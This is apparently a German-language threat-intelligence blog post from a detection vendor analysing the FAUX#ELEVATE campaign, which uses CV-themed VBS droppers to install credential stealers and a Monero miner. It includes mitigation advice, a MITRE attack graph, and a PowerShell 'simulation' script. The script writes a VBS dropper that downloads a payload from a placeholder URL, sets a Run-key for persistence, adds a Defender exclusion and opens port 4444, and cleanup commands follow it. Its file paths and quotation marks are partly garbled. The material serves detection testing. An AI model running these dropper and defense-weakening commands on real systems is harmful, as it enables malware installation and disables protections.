Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen auf Frankreich mit CV-Ködern, um Krypto-Miner und Infostealer in Unternehmensumgebungen zu installieren

Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime

Folgen

Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen auf Frankreich mit CV-Ködern, um Krypto-Miner und Infostealer in Unternehmensumgebungen zu installieren

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

Eine Cybercrime-Operation nutzt eine bösartige VBS-Lebenslaufdatei, um auf Französisch sprechende Unternehmensumgebungen abzuzielen. Der Dropper ist stark verschleiert und so konzipiert, dass er nur auf domänengebundenen Maschinen ausgeführt wird, wo er Malware zur Anmeldeinformationsdiebstahl zusammen mit einem Monero-Miner liefert. Die Kampagne nutzt vertrauenswürdige Dienste wie Dropbox und kompromittierte marokkanische WordPress-Websites, um Nutzlasten zu hosten. Gestohlene Daten werden über SMTP nach mail.ruexfiltriert, und die Malware entfernt Spuren nach der Ausführung, um die forensische Sichtbarkeit zu verringern.

Untersuchung

Forscher haben den VBS-Dropper rückentwickelt, seine Umgebungsprüfungen aufgedeckt und die vollständige, mehrstufige Infektionskette nachverfolgt, einschließlich der 7-Zip-Extraktion, eines benutzerdefinierten RATs namens RuntimeHost.exe, dem Diebstahl von Browser-Anmeldeinformationen über ChromElevator und der XMRig-Mining-Aktivität. Sie identifizierten auch unterstützende Infrastrukturen wie IP-Adressen, dynamische DNS-Einträge und gehackte WordPress-Server. Die Persistenz wurde mit Registrierungsschlüsseln für den Start verbunden und einer versteckten geplanten Aufgabe.

Minderung

Verteidiger sollten verdächtige VBS-Dateien blockieren und strenge Kontrollen bei E-Mail-Anhängen durchsetzen. Die Überwachung sollte sich auf die ungewöhnliche Ausführung von wscript.exe, PowerShell-Befehle, die Defender-Ausschlüsse hinzufügen, und Registrierungsänderungen, die EnableLUA betreffen, konzentrieren. Organisationen sollten ausgehende SMTP-Verbindungen von Nicht-Mail-Anwendungen einschränken und Verbindungen zu bekannten Dropbox- und Mining-Pool-Infrastrukturen beobachten. Jegliche identifizierten Registrierungsschlüssel oder geplante Aufgaben sollten entfernt oder unter Quarantäne gestellt werden.

Reaktion

Sicherheitsteams sollten die Erstellung der „Microsoft Media Service“ und „z_MicrosoftEdgeAutoLaunch_2EDFBF“ Registrierungsschlüssel sowie die versteckte „MicrosoftUpdateService“ geplante Aufgabe erkennen. Warnungen sollten ausgelöst werden durch wscript.exe-Prozesse, die auf Dropbox oder die dokumentierten WordPress-Domains zugreifen. Schädliche Dateien müssen unter Quarantäne gestellt, der Host isoliert und die offengelegten Browser-Anmeldeinformationen zurückgesetzt werden. Eine forensische Überprüfung sollte anschließend klären, ob Daten durch mail.ru.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["Technik – T1566.001 Phishing: Spear-Phishing-Anhang Beschreibung: E-Mail mit bösartigem Anhang, die beim Öffnen die erste Nutzlast liefert."] class step_phishing action step_user_execute["Technik – T1204.002 Benutzerausführung: Bösartige Datei Beschreibung: Das Opfer führt die angehängte VBS-Datei aus und löst den Dropper aus."] class step_user_execute action step_dropper["Technik – T1059.005 Visual Basic (VBScript) Technik – T1027 Verschleierte Dateien oder Informationen Beschreibung: Verschleiertes VBS-Skript dient als Dropper, der zusätzliche Komponenten extrahiert."] class step_dropper action step_domain_check["Technik – T1069.002 Berechtigungsgruppen-Erkennung: Domain Beschreibung: Überprüft, ob der Host einer Domain beigetreten ist, um das Verhalten anzupassen."] class step_domain_check technique step_uac_bypass["Technik – T1548.002 Benutzerkontensteuerung umgehen Technik – T1562.001 Verteidigungen beeinträchtigen: Sicherheitstools deaktivieren Technik – T1564.012 Artefakte verstecken: Defender-Ausschlüsse Beschreibung: Erhöht Privilegien, deaktiviert Verteidigungen und fügt Ausschlüsse hinzu."] class step_uac_bypass technique step_download["Technik – T1102 Webservice Technik – T1102.001 Dead Drop-Resolver Beschreibung: Ruft zusätzliche Nutzlasten von Dropbox oder Web-Standorten ab."] class step_download technique step_deploy_toolkit["Tool – RuntimeHost.exe, XMRig Miner, Browser-Stealer Beschreibung: Setzt Komponenten zur Nutzung für Mining, Anmeldeinformationsdiebstahl und weitere Ausnutzung ein."] class step_deploy_toolkit tool step_cred_access["Technik – T1555.003 Anmeldeinformationen von Webbrowsern Beschreibung: Extrahiert gespeicherte Browser-Passwörter und Cookies."] class step_cred_access technique step_collect_files["Technik – T1005 Daten vom lokalen System Beschreibung: Sammelt Dateien vom Desktop des Benutzers für die Exfiltration."] class step_collect_files technique step_exfiltration["Technik – T1048.002 Exfiltration über verschlüsseltem Nicht-C2-Protokoll: SMTP Technik – T1071.003 Webprotokolle: Mail-Protokolle Beschreibung: Sendet gesammelte Daten über verschlüsseltes SMTP."] class step_exfiltration technique step_resource_hijack["Technik – T1496 Ressourcenumleitung Beschreibung: Nutzt XMRig zum Kryptowährungs-Mining auf dem Opferhost."] class step_resource_hijack technique step_process_injection["Technik – T1055 Prozessinjektion Beschreibung: Injiziert schädlichen Code in explorer.exe, um Aktivitäten zu verbergen."] class step_process_injection technique step_c2["Technik – T1102 Web Service (HTTPS/Dynamic DNS) Beschreibung: Hält Befehls- und Steuerungskontrolle über verschlüsselten Webverkehr und benutzerdefinierte Ports aufrecht."] class step_c2 technique step_persistence["Technik – T1547.001 Registry Run Keys / Startordner Technik – T1053 Geplante Aufgabe/Job (versteckt) Beschreibung: Etabliert Persistenz über Run-Schlüssel und eine versteckte geplante Aufgabe."] class step_persistence technique step_cleanup["Technik – T1070.004 Dateilöschung Beschreibung: Entfernt Artefakte und Protokolle, um eine Erkennung zu vermeiden."] class step_cleanup technique %% Edge connections step_phishing –>|führt zu| step_user_execute step_user_execute –>|führt zu| step_dropper step_dropper –>|führt zu| step_domain_check step_domain_check –>|führt zu| step_uac_bypass step_uac_bypass –>|führt zu| step_download step_download –>|führt zu| step_deploy_toolkit step_deploy_toolkit –>|ermöglicht| step_cred_access step_deploy_toolkit –>|ermöglicht| step_collect_files step_cred_access –>|kombiniert mit| step_collect_files step_cred_access –>|unterstützt| step_exfiltration step_collect_files –>|unterstützt| step_exfiltration step_deploy_toolkit –>|ermöglicht| step_resource_hijack step_deploy_toolkit –>|ermöglicht| step_process_injection step_process_injection –>|bietet| step_c2 step_c2 –>|genutzt von| step_exfiltration step_deploy_toolkit –>|etabliert| step_persistence step_persistence –>|gefolgt von| step_cleanup step_exfiltration –>|gefolgt von| step_cleanup "

Angriffsablauf

Angriffsbericht & Befehle:
1. Stufe 1 – Bösartiges VBS ablegen: Der Angreifer schreibt einen VBS-Dropper, der eine Nutzlast der zweiten Stufe herunterlädt und einen Registrierungslauf-Schlüssel für die Persistenz schreibt.
2. Stufe 2 – VBS ausführen über wscript.exe mit PowerShell als übergeordnetem Prozess, wodurch die übergeordnete Bedingung der Erkennung erfüllt wird.
3. Stufe 3 – Innerhalb des VBS PowerShell aufrufen, um einen Microsoft Defender-Ausschluss hinzuzufügen (T1562.001) und Netsh, um den TCP-Eingangsport 4444 (T1562.004) für C2 zu öffnen.
4. Stufe 4 – Beweise nach Erfolg bereinigen.

Regressionstest-Skript: (PowerShell – eigenständig; mit Administratorrechten ausführen)

# -----------------------------------------------------------------------
# Schädliche VBS-Dropper-Simulation – löst Sigma-Regel aus:
#   Bild == "*wscript.exe" UND ParentImage in ("*powershell.exe","*netsh.exe")
# -----------------------------------------------------------------------

$vbsPath = "$env:Tempmalicious_dropper.vbs"
$payloadUrl = "http://example.com/payload.exe"   # Platzhalter-URL
$payloadPath = "$env:Temppayload.exe"

# 1. Schaffe bösartiges VBS, das:
#    • eine Nutzlast herunterlädt
#    • einen Run-Schlüssel für die Persistenz schreibt
#    • PowerShell aufruft, um Defender-Ausschluss hinzuzufügen
#    • Netsh aufruft, um eine Firewall-Regel zu öffnen
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", "$payloadUrl", False
objXML.Send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$payloadPath", 2
End If

‚ Persistenz durch Run-Schlüssel Set objShell = CreateObject(„WScript.Shell“) objShell.RegWrite „HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious“, „$payloadPath“

‚ Defender-Ausschluss via PowerShell (innerhalb ausgeführt) objShell.Run „powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'„“, 0, True

‚ Öffne Firewall-Port 4444 via Netsh (innerhalb ausgeführt) objShell.Run „netsh.exe advfirewall firewall add rule name="MaliciousPort“ dir=in action=allow protocol=TCP localport=4444″, 0, True „@

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Starte das VBS mit PowerShell als übergeordnetem Prozess
Write-Host "[*] Starte bösartiges VBS über wscript.exe (übergeordnet: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Prüfen, ob die Firewall-Regel hinzugefügt wurde (optional)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Bereinige Artefakte (Payload & VBS) - separat für den Bereinigungsabschnitt belassen
Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie Warnungen im SIEM."

Bereinigungskommandos: (nach Überprüfung ausführen)

# Entferne Firewall-Regel
netsh advfirewall firewall delete rule name="MaliciousPort"

# Entferne Defender-Ausschluss
powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"

# Lösche Persistenz-Run-Schlüssel
reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f

# Lösche Dateien
Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
Remove-Item -Path "$env:Temppayload.exe" -Force

Write-Host "[+] Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten